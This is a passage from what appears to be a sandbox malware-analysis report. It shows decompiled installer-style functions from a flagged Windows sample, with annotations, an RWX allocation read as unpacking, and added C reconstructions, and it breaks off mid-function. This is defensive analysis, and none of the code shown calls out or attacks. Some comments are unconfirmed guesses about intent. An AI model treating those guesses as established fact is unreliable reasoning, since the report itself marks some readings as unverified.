Instruction addresses for the C lines above (one per line; the line-to-address alignment was lost in extraction): 0x00404880, 0x0040488c, 0x00404894, 0x004048a0, 0x004048c9, 0x004048ce, 0x004048a2, 0x004048a8, 0x004048b7, 0x004048bc, 0x004048aa, 0x004048ac, 0x004048ac, 0x004048a8, 0x004048de, 0x004048e7, 0x0040490b, 0x004048ee, 0x004048f0, 0x00000000, 0x00404902

APIs
• CreateFileA.KERNELBASE(00008000,-80000000,00000000,00000000,?,00000080,00000000,00000000,00000000,00000000,00404A23,?,00404F67,*MEMCAB,00008000,00000180), ref: 004048DE
• CreateFileA.KERNEL32(00008000,-80000000,00000000,00000000,?,00000080,00000000,?,00404F67,*MEMCAB,00008000,00000180), ref: 00404902
Memory Dump Source
• Source File: 00000000.00000002.446310125.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.446310125.000000000040C000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_szDGo5lHdI.jbxd
Similarity
• API ID: CreateFile
• String ID:
• API String ID: 823142352-0
• Opcode ID: fadf226ed69bbb41dbb50a9d93363128b59b8e1147c1ebbdb1745835005b5b17
• Instruction ID: dce78edff5e7a467645b78d59c04aaa4689d7eeda0cc1ba10610c6ef675d671e
• Opcode Fuzzy Hash: fadf226ed69bbb41dbb50a9d93363128b59b8e1147c1ebbdb1745835005b5b17
• Instruction Fuzzy Hash: B00128E7E116702AF22450294C88FB7551C8BD6634F1A4736BEAABA2D2D5784C0481E8
Uniqueness
• Uniqueness Score: -1.00%

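The `sbb esi, esi` select in the CreateFileA wrapper above is one place where the decompiler output cannot be taken literally: evaluated as printed, `(~(edx & 0x200) & 0xfffffffe) + 4` yields 0xfffffe02 when bit 0x200 is set, which is not a valid dwCreationDisposition. The C below is an added example written for this report, not code recovered from the sample. It puts the readable decision, the branchless idiom the compiler most likely emitted, and the decompiler's literal expression side by side so the difference is visible. Assumptions: the flag-bit names are labels chosen here; the `neg; sbb; and; add` sequence and its polarity (bit 0x200 set selects CREATE_ALWAYS) are the editor's reading and have not been confirmed against the disassembly at 0x004048a8-0x004048ac.

```c
#include <stdint.h>
#include <stdio.h>

/* Documented Win32 dwCreationDisposition values (not recovered from the sample). */
#define CREATE_NEW     1u
#define CREATE_ALWAYS  2u
#define OPEN_EXISTING  3u
#define OPEN_ALWAYS    4u

/* Bits tested in the decompiled function. The names are this example's labels. */
#define FLAG_CREATE_NEW_BIT  0x400u
#define FLAG_OVERWRITE_BIT   0x200u

/* Readable form of the decision: 0x400 -> CREATE_NEW, else 0x200 picks CREATE_ALWAYS vs OPEN_ALWAYS. */
uint32_t disposition_readable(uint32_t flags)
{
    if (flags & FLAG_CREATE_NEW_BIT)
        return CREATE_NEW;
    return (flags & FLAG_OVERWRITE_BIT) ? CREATE_ALWAYS : OPEN_ALWAYS;
}

/* Branchless form, assumed to be "neg eax; sbb esi, esi; and esi, -2; add esi, 4":
   neg sets CF iff its operand is non-zero, so sbb esi, esi leaves 0 or 0xffffffff. */
uint32_t disposition_branchless(uint32_t flags)
{
    if (flags & FLAG_CREATE_NEW_BIT)
        return CREATE_NEW;
    uint32_t bit  = flags & FLAG_OVERWRITE_BIT;
    uint32_t mask = bit ? 0xffffffffu : 0u;   /* what sbb esi, esi produces (polarity assumed) */
    return (mask & 0xfffffffeu) + 4u;         /* 0xfffffffe + 4 wraps to 2; 0 + 4 is 4 */
}

/* The decompiler's expression taken literally: ~ stands in for the lost carry dependency. */
uint32_t disposition_as_printed(uint32_t flags)
{
    if (flags & FLAG_CREATE_NEW_BIT)
        return CREATE_NEW;
    return (~(flags & FLAG_OVERWRITE_BIT) & 0xfffffffeu) + 4u;
}

/* Retry rule after the first CreateFileA: every disposition except OPEN_EXISTING gets one retry. */
int should_retry_after_failure(uint32_t disposition)
{
    return disposition != OPEN_EXISTING;
}

int main(void)
{
    /* Constructed flag words covering each branch of the decision. */
    uint32_t samples[] = { 0x000u, 0x200u, 0x400u, 0x600u };
    for (size_t i = 0; i < sizeof samples / sizeof samples[0]; i++) {
        uint32_t f = samples[i];
        printf("flags=0x%03x readable=%u branchless=%u as_printed=0x%08x retry=%d\n",
               f, disposition_readable(f), disposition_branchless(f),
               disposition_as_printed(f), should_retry_after_failure(disposition_readable(f)));
    }
    return 0;
}
```

The literal expression agrees with neither reading for a flag word of 0x200, which is the cue to open the disassembly rather than trust the C view for carry-based selects; the retry rule, by contrast, is rendered faithfully and needs no such check.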
C-Code - Quality: 93%
			E00404AD0(signed int _a4, void* _a8, long _a12) {
				// _a4: index into the 0x18-byte handle table at 0x408d74; _a8/_a12: buffer and byte count to write
				signed int _t9;
				int _t12;
				signed int _t14;
				signed int _t15;
				void* _t20;
				struct HWND__* _t21;
				signed int _t24;
				signed int _t25;

				_t20 =  *0x40858c; // 0x154
				_t9 = E00403680(_t20); // waits on the handle while pumping window messages (see subcall APIs below)
				if( *0x4091d8 == 0) { // global at 0x4091d8 still clear (presumably a cancel/abort flag)
					_push(_t24);
					_t12 = WriteFile( *(0x408d74 + _a4 * 0x18), _a8, _a12,  &_a12, 0); // executed; bytes written are stored into _a12
					if(_t12 != 0) {
						_t25 = _a12;
						if(_t25 != 0xffffffff) {
							_t14 =  *0x409400; // 0x10a200, running total of bytes written
							_t15 = _t14 + _t25;
							 *0x409400 = _t15;
							if( *0x408184 != 0) { // progress display enabled
								_t21 =  *0x408584; // 0x0, dialog HWND
								if(_t21 != 0) {
									// PBM_SETPOS (0x402) on control 0x83a: percent = bytes so far * 100 / expected total at 0x4093f8
									SendDlgItemMessageA(_t21, 0x83a, 0x402, _t15 * 0x64 /  *0x4093f8, 0);
								}
							}
						}
					} else {
						_t25 = _t24 | 0xffffffff; // WriteFile failed: return -1
					}
					return _t25; // bytes written, or -1
				} else {
					return _t9 | 0xffffffff; // aborted before writing: return -1
				}
			}
Instruction addresses for the C lines above (one per line; the line-to-address alignment was lost in extraction): 0x00404ad5, 0x00404adb, 0x00404ae7, 0x00404aee, 0x00404b05, 0x00404b0d, 0x00404b14, 0x00404b1a, 0x00404b1c, 0x00404b21, 0x00404b2a, 0x00404b2f, 0x00404b31, 0x00404b39, 0x00404b54, 0x00404b54, 0x00404b39, 0x00404b2f, 0x00404b0f, 0x00404b0f, 0x00404b0f, 0x00404b5e, 0x00404ae9, 0x00404aed, 0x00404aed

APIs
  • Part of subcall function 00403680: MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 0040369F
  • Part of subcall function 00403680: PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 004036B2
  • Part of subcall function 00403680: PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 004036DA
• WriteFile.KERNELBASE(?,?,?,?,00000000), ref: 00404B05
Memory Dump Source
• Source File: 00000000.00000002.446310125.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.446310125.000000000040C000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_szDGo5lHdI.jbxd
Similarity
• API ID: MessagePeek$FileMultipleObjectsWaitWrite
• String ID:
• API String ID: 1084409-0
• Opcode ID: ab6259a8a4d2dd022a3c8d33f5e1e8a15f83e3210f04ee4509b3a011844fb6d6
• Instruction ID: 7cceea35d73159b26d1b83d1328ee4e94251b7085b3a179f835f58e33a962e09
• Opcode Fuzzy Hash: ab6259a8a4d2dd022a3c8d33f5e1e8a15f83e3210f04ee4509b3a011844fb6d6
• Instruction Fuzzy Hash: 74018071200205ABDB149F59DE05BA27769AB84725F04823AFA39BB2E1CB74DC11CB58
Uniqueness
• Uniqueness Score: -1.00%

C-Code - Quality: 100%
E0040658A(char* __ecx, void* __edx, char* _a4) {
	intOrPtr _t4;
	char* _t6;
	char* _t8;
	void* _t10;
	void* _t12;
	char* _t16;
	intOrPtr* _t17;
	void* _t18;
	char* _t19;

	_t16 = __ecx;
	_t10 = __edx;
	_t17 = __ecx;
	_t1 = _t17 + 1; // 0x408b3f
	_t12 = _t1;
	do {
		_t4 =  *_t17;
		_t17 = _t17 + 1;
	} while (_t4 != 0);
	_t18 = _t17 - _t12;
	_t2 = _t18 + 1; // 0x408b40
	if(_t2 < __edx) {
		_t19 = _t18 + __ecx;
		if(_t19 > __ecx) {
			_t8 = CharPrevA(__ecx, _t19); // executed
			if( *_t8 != 0x5c) {
				 *_t19 = 0x5c;
				_t19 =  &(_t19[1]);
			}
		}
		_t6 = _a4;
		 *_t19 = 0;
		while( *_t6 == 0x20) {
			_t6 = _t6 + 1;
		}
		return E004016B3(_t16, _t10, _t6);
	}
	return 0x8007007a;
}

Listing addresses (in the order of the C-code lines above): 0x00406592 0x00406594 0x00406596 0x00406598 0x00406598 0x0040659b 0x0040659b 0x0040659d 0x0040659e 0x004065a2 0x004065a4 0x004065a9 0x004065b2 0x004065b6 0x004065ba 0x004065c3 0x004065c5 0x004065c8 0x004065c8 0x004065c3 0x004065c9 0x004065cc 0x004065d2 0x004065d1 0x004065d1 0x00000000 0x004065dc 0x00000000

APIs
• CharPrevA.USER32(00408B3E,00408B3F,00000001,00408B3E,-00000003,?,004060EC,00401140,?), ref: 004065BA
Memory Dump Source
• Source File: 00000000.00000002.446310125.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.446310125.000000000040C000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_szDGo5lHdI.jbxd
Similarity
• API ID: CharPrev
• String ID:
• API String ID: 122130370-0
• Opcode ID: b08d9a994ba15229853f1fb0455e3b44e106027da8ecf514dd4033e1e77c22ce
• Instruction ID: 40dc54a50ef1d9b939454141e84776cfaea9ff212e965cea6d62fa9ba78ea7d4
• Opcode Fuzzy Hash: b08d9a994ba15229853f1fb0455e3b44e106027da8ecf514dd4033e1e77c22ce
• Instruction Fuzzy Hash: B3F02D32104250BFD3314919BC84B67BFDD9B86350F16017FE8DBA3385CA7D4D5682A9
Uniqueness
• Uniqueness Score: -1.00%

C-Code - Quality: 93%
E0040621E() {
	signed int _v8;
	char _v268;
	signed int _t5;
	void* _t9;
	void* _t13;
	void* _t19;
	void* _t20;
	signed int _t21;

	_t5 =  *0x408004; // 0x8f135e3b
	_v8 = _t5 ^ _t21;
	if(GetWindowsDirectoryA( &_v268, 0x104) != 0) {
		0x4f0 = 2;
		_t9 = E0040597D( &_v268, 0x4f0, _t19, 0x4f0); // executed
	} else {
		E004044B9(0, 0x4f0, _t8, _t8, 0x10, _t8);
		 *0x409124 = E00406285();
		_t9 = 0;
	}
	return E00406CE0(_t9, _t13, _v8 ^ _t21, 0x4f0, _t19, _t20);
}

Listing addresses (in the order of the C-code lines above): 0x00406229 0x00406230 0x00406247 0x0040626a 0x00406272 0x00406249 0x00406255 0x0040625f 0x00406264 0x00406264 0x00406284

APIs
• GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 0040623F
• Part of subcall function 004044B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00404518
• Part of subcall function 004044B9: MessageBoxA.USER32(?,?,doza2,00010010), ref: 00404554
• Part of subcall function 00406285: GetLastError.KERNEL32(00405BBC), ref: 00406285
Memory Dump Source
• Source File: 00000000.00000002.446310125.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.446310125.000000000040C000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_szDGo5lHdI.jbxd
Similarity
• API ID: DirectoryErrorLastLoadMessageStringWindows
• String ID:
• API String ID: 381621628-0
• Opcode ID: 3325270bcf1ca384f477d4cfa035b617f289eb05c34c13c48fc71639da7fe5a9
• Instruction ID: c9fc7c92a7cec4c9f4a35bfa16e57d250416f75581f2c593a26caa7fdf97897f
• Opcode Fuzzy Hash: 3325270bcf1ca384f477d4cfa035b617f289eb05c34c13c48fc71639da7fe5a9
• Instruction Fuzzy Hash: 49F0B4B07042086BE750FB758E02FBA32A8DB44304F4100BFBA86F61D1DD789D648658
Uniqueness
• Uniqueness Score: -1.00%

C-Code - Quality: 100%
	E00404B60(signed int _a4) {
		signed int _t9;
		signed int _t15;

		// _a4 indexes a global table of 0x18-byte entries based at 0x408d60.
		// Field offsets used below (relative to the entry): +0x00 "closed" flag,
		// +0x04 entry type, +0x08/+0x0c/+0x10 zeroed on release, +0x14 handle.
		_t15 = _a4 * 0x18;
		if( *((intOrPtr*)(_t15 + 0x408d64)) != 1) {
			// Entries whose type is not 1 own a kernel handle. FindCloseChangeNotification
			// is functionally CloseHandle (both end in NtClose), so this closes an arbitrary
			// handle under a less conspicuous import name.
			_t9 = FindCloseChangeNotification( *(_t15 + 0x408d74)); // executed
			if(_t9 == 0) {
				return _t9 | 0xffffffff; // close failed: return -1
			}
			 *((intOrPtr*)(_t15 + 0x408d60)) = 1; // mark the slot released
			return 0;
		}
		// Type-1 entries carry no handle: just mark released and clear the three data fields.
		 *((intOrPtr*)(_t15 + 0x408d60)) = 1;
		 *((intOrPtr*)(_t15 + 0x408d68)) = 0;
		 *((intOrPtr*)(_t15 + 0x408d70)) = 0;
		 *((intOrPtr*)(_t15 + 0x408d6c)) = 0;
		return 0;
	}





Addresses: 0x00404b66, 0x00404b74, 0x00404b98, 0x00404ba0, 0x00000000, 0x00404bac, 0x00404ba4, 0x00000000, 0x00404ba4, 0x00404b78, 0x00404b7e, 0x00404b84, 0x00404b8a, 0x00000000

APIs
• FindCloseChangeNotification.KERNELBASE(?,00000000,00000000,?,00404FA1,00000000), ref: 00404B98
Memory Dump Source
• Source File: 00000000.00000002.446310125.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.446310125.000000000040C000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_szDGo5lHdI.jbxd
Similarity
• API ID: ChangeCloseFindNotification
• String ID:
• API String ID: 2591292051-0
• Opcode ID: 81f8c292e8a167303dab4fee7506f6ace6dbeb9d23bbb5b0b049432824c4c0aa
• Instruction ID: b92c02e1d42775b4d64c1b480fc1218859da62ddf6c23338d971301b0ff3d73c
• Opcode Fuzzy Hash: 81f8c292e8a167303dab4fee7506f6ace6dbeb9d23bbb5b0b049432824c4c0aa
• Instruction Fuzzy Hash: F4F0FE71500B089EC7618E398E00653BBE4AED53603100A3F95EEF21D0EB34A871DB98
Uniqueness
• Uniqueness Score: -1.00%
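The decompilation of E00404B60 above only shows raw offsets into the table at 0x408d60. The following is an added reconstruction, not code from the sample or from Joe Sandbox, that maps those offsets onto a struct and reproduces the release logic so the two paths (handle-owning entry vs. type-1 entry) can be exercised. Field names, the slot_t type, release_slot(), and the fake_close() stand-in for FindCloseChangeNotification are all assumptions for illustration; only the offsets and the control flow come from the listing.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Hypothetical layout of one 0x18-byte entry indexed by E00404B60
 * (entry = 0x408d60 + index * 0x18). Offsets come from the decompilation;
 * the field names are assumed, not recovered symbols. */
typedef struct {
    uint32_t closed;   /* +0x00: set to 1 once the slot is released           */
    uint32_t kind;     /* +0x04: compared against 1; kind==1 owns no handle   */
    uint32_t field8;   /* +0x08: zeroed when a kind==1 slot is released       */
    uint32_t fieldc;   /* +0x0c: zeroed when a kind==1 slot is released       */
    uint32_t field10;  /* +0x10: zeroed when a kind==1 slot is released       */
    uint32_t handle;   /* +0x14: passed to FindCloseChangeNotification        */
} slot_t;

_Static_assert(sizeof(slot_t) == 0x18, "entry size must match index * 0x18");

/* Stand-in for FindCloseChangeNotification/CloseHandle so this runs off Windows:
 * returns nonzero on success, 0 on failure (assumed sentinel 0xBAD fails). */
typedef int (*close_fn)(uint32_t handle);
static int fake_close(uint32_t h) { return h != 0xBADu; }

/* Same control flow as E00404B60: returns 0 on success, -1 if the close fails. */
int release_slot(slot_t *table, unsigned index, close_fn close_handle) {
    slot_t *s = &table[index];
    if (s->kind != 1) {
        if (!close_handle(s->handle))
            return -1;              /* _t9 | 0xffffffff in the listing */
        s->closed = 1;
        return 0;
    }
    s->closed = 1;                  /* kind==1: no handle, just clear state */
    s->field8 = 0;
    s->field10 = 0;
    s->fieldc = 0;
    return 0;
}

/* Runs the three reachable paths and returns how many behaved as the
 * decompilation predicts (3 when everything matches). */
int run_scenarios(void) {
    slot_t t[2];
    int ok = 0;
    memset(t, 0, sizeof t);

    t[0].kind = 0; t[0].handle = 0x44;          /* handle-owning entry */
    if (release_slot(t, 0, fake_close) == 0 && t[0].closed == 1) ok++;

    t[1].kind = 1; t[1].field8 = 7; t[1].fieldc = 8; t[1].field10 = 9;
    if (release_slot(t, 1, fake_close) == 0 && t[1].closed == 1 &&
        t[1].field8 == 0 && t[1].fieldc == 0 && t[1].field10 == 0) ok++;

    t[0].closed = 0; t[0].handle = 0xBADu;      /* close failure path */
    if (release_slot(t, 0, fake_close) == -1 && t[0].closed == 0) ok++;

    return ok;
}

int main(void) {
    printf("scenarios matching the decompiled behaviour: %d/3\n", run_scenarios());
    return 0;
}
```

The point for an analyst is the `closed` flag: on a failed close the slot is left unmarked, so a later caller can retry it, and only the non-type-1 path ever touches a kernel handle.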

C-Code - Quality: 100%
	E004066AE(CHAR* __ecx) {
		unsigned int _t1;

		// Path arrives in ECX (register calling convention).
		_t1 = GetFileAttributesA(__ecx); // executed
		if(_t1 != 0xffffffff) {
			// Bit 4 of the attribute mask is FILE_ATTRIBUTE_DIRECTORY (0x10). The
			// decompiler renders the original shift/not/and as a logical "!"; the
			// intent is a test of that one bit, so the result is 1 for an existing
			// path that is not a directory and 0 for a directory.
			return  !(_t1 >> 4) & 0x00000001;
		} else {
			// INVALID_FILE_ATTRIBUTES: the path does not exist or is inaccessible.
			return 0;
		}
	}




Addresses: 0x004066b1, 0x004066ba, 0x004066c7, 0x004066bc, 0x004066be, 0x004066be

APIs
• GetFileAttributesA.KERNELBASE(?,00404777,?,00404E38,?), ref: 004066B1
Memory Dump Source
• Source File: 00000000.00000002.446310125.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.446310125.000000000040C000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_szDGo5lHdI.jbxd
Similarity
• API ID: AttributesFile
• String ID:
• API String ID: 3188754299-0
• Opcode ID: c7a10a2f911a57d7b615a8355233fd4650d5e9e4080771bf9336d98f7453a15a
• Instruction ID: b0bf721a4a9401975da429cbe36b66188ee692fd53fb4aa260148cb1fc4dfac4
• Opcode Fuzzy Hash: c7a10a2f911a57d7b615a8355233fd4650d5e9e4080771bf9336d98f7453a15a
• Instruction Fuzzy Hash: D0B0927662254442AA200A316C2995A2845A6C123A7E52BA1F033E02E0CA3EC8A6D008
Uniqueness
• Uniqueness Score: -1.00%

APIs
• VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 069024D6
  (flAllocationType 0x1000 = MEM_COMMIT, flProtect 0x40 = PAGE_EXECUTE_READWRITE: an RWX allocation issued from a region that is not backed by a PE image, consistent with the unpacking behaviour flagged in the report's signatures)
Memory Dump Source
• Source File: 00000000.00000002.447521600.0000000006902000.00000040.00000020.00020000.00000000.sdmp, Offset: 06902000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6902000_szDGo5lHdI.jbxd
Yara matches
Similarity
• API ID: AllocVirtual
• String ID:
• API String ID: 4275171209-0
• Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
• Instruction ID: 1fbfd9e400b4fe012d663d2caeefea7702bb87c9de692c223b9f7e82625e4505
• Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
• Instruction Fuzzy Hash: 2C113C79A00208EFDB41DF98C989E99BBF5EF08350F158094F9489B361D371EA90DF84
Uniqueness
• Uniqueness Score: -1.00%

C-Code - Quality: 100%
	E00404CA0(long _a4) {
		void* _t2;

		// Thin allocator wrapper: uFlags 0 is GMEM_FIXED, so the return value is a
		// directly usable pointer (not a movable handle) to _a4 bytes.
		_t2 = GlobalAlloc(0, _a4); // executed
		return _t2;
	}
APIs
• GlobalAlloc.KERNELBASE(00000000,?), ref: 00404CAA
Memory Dump Source
• Source File: 00000000.00000002.446310125.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.446310125.000000000040C000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_szDGo5lHdI.jbxd
Similarity
• API ID: AllocGlobal
• String ID:
• API String ID: 3761449716-0
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
			#include <windows.h>

			/* Thin wrapper around GlobalFree: releases a handle from GlobalAlloc; returns NULL on success, the handle on failure. */
			void* E00404CC0(void* _a4) {
				void* _t2;

				_t2 = GlobalFree(_a4); // executed
				return _t2;
			}
APIs
Memory Dump Source
• Source File: 00000000.00000002.446310125.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.446310125.000000000040C000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_szDGo5lHdI.jbxd
Similarity
• API ID: FreeGlobal
• String ID:
• API String ID: 2979337801-0
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 92%
			E00405C9E(void* __ebx, CHAR* __ecx, void* __edi, void* __esi) {
				signed int _v8;
				signed int _v12;
				CHAR* _v265;
				char _v266;
				char _v267;
				char _v268;
				CHAR* _v272;
				char _v276;
				signed int _v296;
				char _v556;
				signed int _t61;
				int _t63;
				char _t67;
				CHAR* _t69;
				signed int _t71;
				void* _t75;
				char _t79;
				void* _t83;
				void* _t85;
				void* _t87;
				intOrPtr _t88;
				void* _t100;
				intOrPtr _t101;
				CHAR* _t104;
				intOrPtr _t105;
				void* _t111;
				void* _t115;
				CHAR* _t118;
				void* _t119;
				void* _t127;
				CHAR* _t129;
				void* _t132;
				void* _t142;
				signed int _t143;
				CHAR* _t144;
				void* _t145;
				void* _t146;
				void* _t147;
				void* _t149;
				char _t155;
				void* _t157;
				void* _t162;
				void* _t163;
				char _t167;
				char _t170;
				CHAR* _t173;
				void* _t177;
				intOrPtr* _t183;
				intOrPtr* _t192;
				CHAR* _t199;
				void* _t200;
				CHAR* _t201;
				void* _t205;
				void* _t206;
				int _t209;
				void* _t210;
				void* _t212;
				void* _t213;
				CHAR* _t218;
				intOrPtr* _t219;
				intOrPtr* _t220;
				signed int _t221;
				signed int _t223;

				_t173 = __ecx; // input string passed in ECX (fastcall-style)
				_t61 =  *0x408004; // 0x8f135e3b: compiler /GS security cookie
				_v8 = _t61 ^ _t221; // cookie XOR frame pointer stored as the stack canary
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t209 = 1;
				if(__ecx == 0 ||  *__ecx == 0) {
					_t63 = 1; // NULL or empty input: nothing to parse
				} else {
					L2:
					while(_t209 != 0) {
						_t67 =  *_t173;
						// skip leading whitespace (space, TAB, CR, LF, VT, FF) one character at a time
						if(_t67 == 0x20 || _t67 == 9 || _t67 == 0xd || _t67 == 0xa || _t67 == 0xb || _t67 == 0xc) {
							_t173 = CharNextA(_t173);
							continue;
						}
						_v272 = _t173; // start of the current token
						if(_t67 == 0) {
                                                                                                                                                                                                                                    							break;
                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                    							_t69 = _v272;
                                                                                                                                                                                                                                    							_t177 = 0;
                                                                                                                                                                                                                                    							_t213 = 0;
                                                                                                                                                                                                                                    							_t163 = 0;
                                                                                                                                                                                                                                    							_t202 = 1;
                                                                                                                                                                                                                                    							do {
                                                                                                                                                                                                                                    								if(_t213 != 0) {
                                                                                                                                                                                                                                    									if(_t163 != 0) {
                                                                                                                                                                                                                                    										break;
                                                                                                                                                                                                                                    									} else {
                                                                                                                                                                                                                                    										goto L21;
                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                                                    									_t69 =  *_t69;
                                                                                                                                                                                                                                    									if(_t69 == 0x20 || _t69 == 9 || _t69 == 0xd || _t69 == 0xa || _t69 == 0xb || _t69 == 0xc) {
                                                                                                                                                                                                                                    										break;
                                                                                                                                                                                                                                    									} else {
                                                                                                                                                                                                                                    										_t69 = _v272;
                                                                                                                                                                                                                                    										L21:
                                                                                                                                                                                                                                    										_t155 =  *_t69;
                                                                                                                                                                                                                                    										if(_t155 != 0x22) {
                                                                                                                                                                                                                                    											if(_t202 >= 0x104) {
                                                                                                                                                                                                                                    												goto L106;
                                                                                                                                                                                                                                    											} else {
                                                                                                                                                                                                                                    												 *((char*)(_t221 + _t177 - 0x108)) = _t155;
                                                                                                                                                                                                                                    												_t177 = _t177 + 1;
                                                                                                                                                                                                                                    												_t202 = _t202 + 1;
                                                                                                                                                                                                                                    												_t157 = 1;
                                                                                                                                                                                                                                    												goto L30;
                                                                                                                                                                                                                                    											}
                                                                                                                                                                                                                                    										} else {
                                                                                                                                                                                                                                    											if(_v272[1] == 0x22) {
                                                                                                                                                                                                                                    												if(_t202 >= 0x104) {
                                                                                                                                                                                                                                    													L106:
                                                                                                                                                                                                                                    													_t63 = 0;
                                                                                                                                                                                                                                    													L125:
                                                                                                                                                                                                                                    													_pop(_t210);
                                                                                                                                                                                                                                    													_pop(_t212);
                                                                                                                                                                                                                                    													_pop(_t162);
                                                                                                                                                                                                                                    													return E00406CE0(_t63, _t162, _v8 ^ _t221, _t202, _t210, _t212);
                                                                                                                                                                                                                                    												} else {
                                                                                                                                                                                                                                    													 *((char*)(_t221 + _t177 - 0x108)) = 0x22;
                                                                                                                                                                                                                                    													_t177 = _t177 + 1;
                                                                                                                                                                                                                                    													_t202 = _t202 + 1;
                                                                                                                                                                                                                                    													_t157 = 2;
                                                                                                                                                                                                                                    													goto L30;
                                                                                                                                                                                                                                    												}
                                                                                                                                                                                                                                    											} else {
                                                                                                                                                                                                                                    												_t157 = 1;
                                                                                                                                                                                                                                    												if(_t213 != 0) {
                                                                                                                                                                                                                                    													_t163 = 1;
                                                                                                                                                                                                                                    												} else {
                                                                                                                                                                                                                                    													_t213 = 1;
                                                                                                                                                                                                                                    												}
                                                                                                                                                                                                                                    												goto L30;
                                                                                                                                                                                                                                    											}
                                                                                                                                                                                                                                    										}
                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                    								goto L131;
                                                                                                                                                                                                                                    								L30:
                                                                                                                                                                                                                                    								_v272 =  &(_v272[_t157]);
                                                                                                                                                                                                                                    								_t69 = _v272;
                                                                                                                                                                                                                                    							} while ( *_t69 != 0);
                                                                                                                                                                                                                                    							if(_t177 >= 0x104) {
                                                                                                                                                                                                                                    								E00406E2A(_t69, _t163, _t177, _t202, _t209, _t213);
                                                                                                                                                                                                                                    								asm("int3");
                                                                                                                                                                                                                                    								_push(_t221);
                                                                                                                                                                                                                                    								_t222 = _t223;
                                                                                                                                                                                                                                    								_t71 =  *0x408004; // 0x8f135e3b
                                                                                                                                                                                                                                    								_v296 = _t71 ^ _t223;
                                                                                                                                                                                                                                    								if(GetWindowsDirectoryA( &_v556, 0x104) != 0) {
                                                                                                                                                                                                                                    									0x4f0 = 2;
                                                                                                                                                                                                                                    									_t75 = E0040597D( &_v272, 0x4f0, _t209, 0x4f0); // executed
                                                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                                                    									E004044B9(0, 0x4f0, _t74, _t74, 0x10, _t74);
                                                                                                                                                                                                                                    									 *0x409124 = E00406285();
                                                                                                                                                                                                                                    									_t75 = 0;
                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                    								return E00406CE0(_t75, _t163, _v12 ^ _t222, 0x4f0, _t209, _t213);
                                                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                                                    								 *((char*)(_t221 + _t177 - 0x108)) = 0;
                                                                                                                                                                                                                                    								if(_t213 == 0) {
                                                                                                                                                                                                                                    									if(_t163 != 0) {
                                                                                                                                                                                                                                    										goto L34;
                                                                                                                                                                                                                                    									} else {
                                                                                                                                                                                                                                    										goto L40;
                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                                                    									if(_t163 != 0) {
                                                                                                                                                                                                                                    										L40:
                                                                                                                                                                                                                                    										_t79 = _v268;
                                                                                                                                                                                                                                    										if(_t79 == 0x2f || _t79 == 0x2d) {
                                                                                                                                                                                                                                    											_t83 = CharUpperA(_v267) - 0x3f;
                                                                                                                                                                                                                                    											if(_t83 == 0) {
                                                                                                                                                                                                                                    												_t202 = 0x521;
                                                                                                                                                                                                                                    												E004044B9(0, 0x521, 0x401140, 0, 0x40, 0);
                                                                                                                                                                                                                                    												_t85 =  *0x408588; // 0x0
                                                                                                                                                                                                                                    												if(_t85 != 0) {
                                                                                                                                                                                                                                    													CloseHandle(_t85);
                                                                                                                                                                                                                                    												}
                                                                                                                                                                                                                                    												ExitProcess(0);
                                                                                                                                                                                                                                    											}
                                                                                                                                                                                                                                    											_t87 = _t83 - 4;
                                                                                                                                                                                                                                    											if(_t87 == 0) {
                                                                                                                                                                                                                                    												if(_v266 != 0) {
                                                                                                                                                                                                                                    													if(_v266 != 0x3a) {
                                                                                                                                                                                                                                    														goto L49;
		} else {
